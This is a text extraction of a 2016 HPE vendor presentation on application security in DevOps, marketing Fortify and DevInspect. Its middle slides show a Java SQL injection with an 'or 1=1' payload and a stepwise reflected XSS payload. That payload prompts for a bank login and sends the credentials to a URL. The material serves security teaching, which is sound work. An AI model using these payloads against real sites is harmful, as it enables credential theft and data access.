discover best of show 2016 - hewlett packard enterprise · 7 ponemon cost of cyber crime study 2015...
TRANSCRIPT
DiscoverBest of Show 2016
2. - 3. März 2016, Düsseldorf
Softwaresicherheit im Zeitalter von DevOps
Lucas von StockhausenRegional Product Manager Fortify
2. - 3. März 2016
The case for Application SecurityI am secure – I have a firewall
3
Malware over the years
4
HPE Security ResearchCyber Risk Report 2016
There is a breach in the headlines almost every day
5http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/
Aircraft Accidents over the years
6
0
20
40
60
80
100
120
140
0
500
1000
1500
2000
2500
3000
Accid
ents
Casualtie
s
Year
Aircraft Accidents
Casualties Accidents
Number of accidents and fatalities per year (excluding sabotage, shoot-downs)
https://aviation-safety.net/statistics/period/
The increase in attacks is constant
7
Ponemon Cost of Cyber Crime Study 2015Ponemon Cost of Cyber Crime Study 2012
1 2 3 4 5 6 7 8
Existing network and perimeter based security is insufficient
84% of breaches exploit vulnerabilities in the application layer
Yet the ratio of spending between perimeter security and application security is 23-to-1- Gartner Maverick Research: Stop Protecting Your Apps; It’s Time for Apps to Protect Themselves (2014)
Basic hacking example
9
Live example
– SQL – Injection
– Telnet
– Cross site scripting
10
SQL-Injection
String userName = ctx.getAuthenticatedUserName();
String itemName = request.getParameter("itemName");
String query = "SELECT * FROM items WHERE owner = '"
+ userName + "' AND itemname = '" + itemName + "'";
ResultSet rs = stmt.execute(query);
username = lucas
itemname = "x' or 1=1; --
String userName = ctx.getAuthenticatedUserName();
String itemName = request.getParameter("itemName");
String query = "SELECT * FROM items WHERE owner = '"
+ lucas+ "' AND itemname = '" + "x' or 1=1; -- + "'";
ResultSet rs = stmt.execute(query);
SELECT * FROM items WHERE owner = 'lucas' AND itemname = 'x' or 1=1; -- '"
SQL-Injection
12
Telnet session
13
XSS – Cross Site Scripting
14
Real word payloads
15
Real-world payloads
– So, what is XSS truly capable off – What can you execute?
Real-world payloads
– Simple answer:
– JavaScript
Real-world payloads
– Simple answer:
– JavaScript
– Wait. That weak-sauce web scripting language that you had to learn in college back in the day?
– How bad could it be?
Real-world payloads
– Javascript is a full-featured programming language
– Object-oriented
– C-like syntax
– Extremely powerful
– Native in every browser
Real-world payloads
– In sum, being able to run JavaScript on a victim’s browser has a LOT of potential
Real-world payloads
– In sum, being able to run JavaScript on a victim’s browser has a LOT of potential
– Let’s take a look at a possible attack and how to build it up
– Let´s go to http://legacy.webapsecurity.com
Real-world payloads
– http://legacy.webapsecurity.com
Real-world payloads
– http://legacy.webappsecurity.com/banklogin.asp?err=<script>alert("buh");</script>
Real-world payloads
– http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('Please enter yourusername',' '); password=prompt('Please enter your password',' '); alert("username="%2B%0Ausername%2B%0A" and password="%2B%0Apassword);</script>
Real-world payloads
– http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('Please enter yourusername',' '); password=prompt('Please enter your password',' '); document.write('<imgsrc="http://localhost:8080/splc/images/top.jpg" alt=""'); document.write('<br>Invalid Login: '%2B%0Ausername);</script>
Real-world payloads
– http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('Please enter yourusername',' '); password=prompt('Please enter your password',' '); document.write('<imgsrc="http://localhost:8080/splc/listMyItems.do?username='%2Busername%2B'%26password='%2Bpassword%2B'">'); document.write('<br>Invalid Login: '%2Busername);</script>
Real-world payloads
– There are many other possibilities and Opportunities
– Remember, if these are the easy options, imagine what others are capable of!
Real-world payloads
– There are a number of ways to launch the actual attack
– Stored XSS
– Reflected XSS
– Owning a page that a victim visits
– Remember, navigating to a page is permission to run what’s on that page
– Consider visiting a webpage is an act of significant trust
What is the reason
29
We convince &
pay the developer
to fix it
4
We are breached or
pay someone to tell
us our code is
insecure
3
Today’s approach > expensive, reactive
IT deploys the
insecure
software
2
Somebody builds
insecure software
1
30X
15X
10X
5X
2X
Why it doesn’t work30x more costly to secure in production
–After an application is released into Production, it costs 30x more than during design.
Co
st
Source: NIST
ProductionSystem
testing
Integration/
component testing
CodingRequirements
Embed security into SDLC
development process 1
This is application security
The right approach > systematic, proactive
In-house Outsourced Commercial Open source
Leverage Security Gate to
validate resiliency of internal or
external code before Production
2
Monitor and protect software
running in Production
3Improve SDLC policies
The help
Static Application Security Testing (SAST) Dynamic Application Security Testing (DAST)
Interactive Application Security Testing (IAST) Runtime Application Self Protection (RASP)
SecurityDevelopment Teams
Build Tool
Example Process for Analysis
Fortify SSC Server
CISO
AWB
Project Security
Lead
Security Auditor
AWB
Development
Manager
IDE
Developer
Fortify SCA
AWB
Fortify CM
AWB
WebInspect
Source Code Repository(s)
Central Build Server(s)
2. Audit
3. Assign
4. Fix
Monitor
6. Report
1. Identify
Defect Tracking System CM
CM
5. Validate
Movement to DevOps
35
• Business leaders have “Agility” at the top of their priorities as they prepare for the fast-paced, very competitive future.
• Processes need to be further streamlined, minimize resource consumption and reduce time-to-market. Security context
• Development organizations can save time and money by building in security early in the development process
Challenges in a DevOps environment
36
• Developers are not security experts
• Security testing is an afterthought
• Pressure to push out software into production leaves no time for security
• Security assessment take up resources
Introducing HPE Security DevInspect
37
Bringing application security closer to the Developer
•AppSec solution created for developers to identify and remediate security vulnerabilities in source code within the native developers environment.
•Brings market-leading AppSec technologies directly to the developer, ensuring secure code as your “shift left” in your dev process.
•Real-time, instant security results as the developer is writing code.
•Enable developers to assess for security weaknesses.
End to End Application Security
38
On-premise
On-demand Fortify on Demand App Defender
Static Dynamic Runtime
Application Development
App Defender
DevInspect
HPE Security DevInspect:
39
•Static Code Analysis
•Real-time lightweight analysis of the source code
•Dynamic Analysis
•Runtime Analysis
•Documentation
What’s included in DevInspect 1.0?
40
•Static Code Analysis
•Real-time lightweight analysis of the source code
• Integration for Fortify Software Security Center (SSC)
• Integration for Fortify on Demand (FoD)
•Documentation
Key Benefits
41
DESIGNED FOR THE DEVELOPER
• Fully integrated into the native development environment (IDE)
• Supports the DevOps toolchain
• Providing thorough and robust software security analysis of an application
INSTANT RESULTS (Fast)
• Inline analysis of the source code as the developer types providing immediate feedback
• Out of the box results – no configuration required
CONTINUOUS FEEDBACK
• Continuously updated security findings as code is written
• Tracks findings and guided developers toward remediation
SecurityDevelopment Teams
Build Tool
Example Process for Static Analysis in DevOps
Fortify SSC Server
CISO
AWB
Project Security
Lead
Security Auditor
AWB
Development
Manager
IDE
Developer
Fortify SCA
AWB
Fortify CM
AWB
WebInspect
Source Code Repository(s)
Central Build Server(s)
3. Milestone Scan
Monitor
5. Report2. Checkin
Defect Tracking System CM
CM
4. Validate
1. DevInspect
Security AssistantReal-time lightweight analysis of the source code
43
All issues detected in the project
Fortify Icon added to iconbar
Vulnerable line of code highlighted& Tool tip for additional information
Detailed remediation advice
Fortify menu for additional options
Thank [email protected]
44